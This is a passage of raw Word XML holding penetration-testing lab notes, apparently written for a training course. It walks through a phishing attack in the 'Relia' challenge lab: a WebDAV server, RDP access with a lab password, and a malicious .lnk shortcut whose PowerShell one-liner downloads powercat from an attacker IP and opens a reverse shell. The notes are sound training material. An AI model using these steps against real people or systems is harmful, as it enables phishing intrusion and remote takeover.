        <w:t xml:space="preserve">execlp("sh", "sh", ...) spawns a shell with those privileges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026AB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026AC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026AD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026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AF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qtcgqzlly8nr" w:id="340"/>
      <w:bookmarkEnd w:id="340"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to check environment variables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026B1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">env</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="775"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used in </w:t>
      </w:r>
      <w:hyperlink r:id="rId809">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Fired</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice to find creds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026B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6B5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026B6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_brjm5tyeypl7" w:id="341"/>
      <w:bookmarkEnd w:id="341"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phishing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026B7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026B8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026B9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phishing examples can be found in the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">27.3.2. Phishing for Access</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" section of XXXXXXXXX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I followed these instructions step by step for the Relia Challenge lab </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026BB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026BC">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Learning the tools along with a practical example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026BD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Important tools for phishing (webdav, .lnk, .Library-ms) are all taught in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXXXXXXXX 11.3.1. Obtaining Code Execution via Windows Library Files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026BE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026BF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Theory:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then the theory of phishing can be found in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Module 14 Phishing Basics of XXXXXXXXX</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026C3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026C4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026C5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lf438rotc68k" w:id="342"/>
      <w:bookmarkEnd w:id="342"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phishing Attack Example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026C6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was seen in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia Challenge lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Phishing was done using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.xxx.249</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine and the target of the phishing attack was</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.xxx.189</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> since they had were the only ones with a bunch of mail services open on their ports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026C9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we knew we could do phishing since on the .249 machine found credentials for a mailing user (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">maildmz@relia.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) and it told us to email</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> jim@relia.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so it was clear this was a phishing attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026CA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026CB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026CC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026CD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir /home/kali/webdav</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure you don't already have one. If you do, delete it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can confirm it's working by going to http://127.0.0.1 and we should see files inside of /home/kali/wedab if it has any</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xfreerdp3 /v:192.168.158.249 /u:hacker /p:'Password123!' /cert:ignore /dynamic-resolution +clipboard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Log in via RDP so you can create shortcut file that will send back reverse shell when clicked by the person we are phishing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a malicious short cut. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This shortcut (when pressed by victim) will send a reverse shell back to us. This is in the format .lnk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Right click on the desktop in RDP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click new</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click shortcut</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the file path, paste this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.232:8000/powercat.ps1'); powercat -c 192.168.45.232 -p 4444 -e powershell"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Save it using any name, like "test"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3454400" cy="2768600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="320" name="image308.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image308.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId810"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3454400" cy="2768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6DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
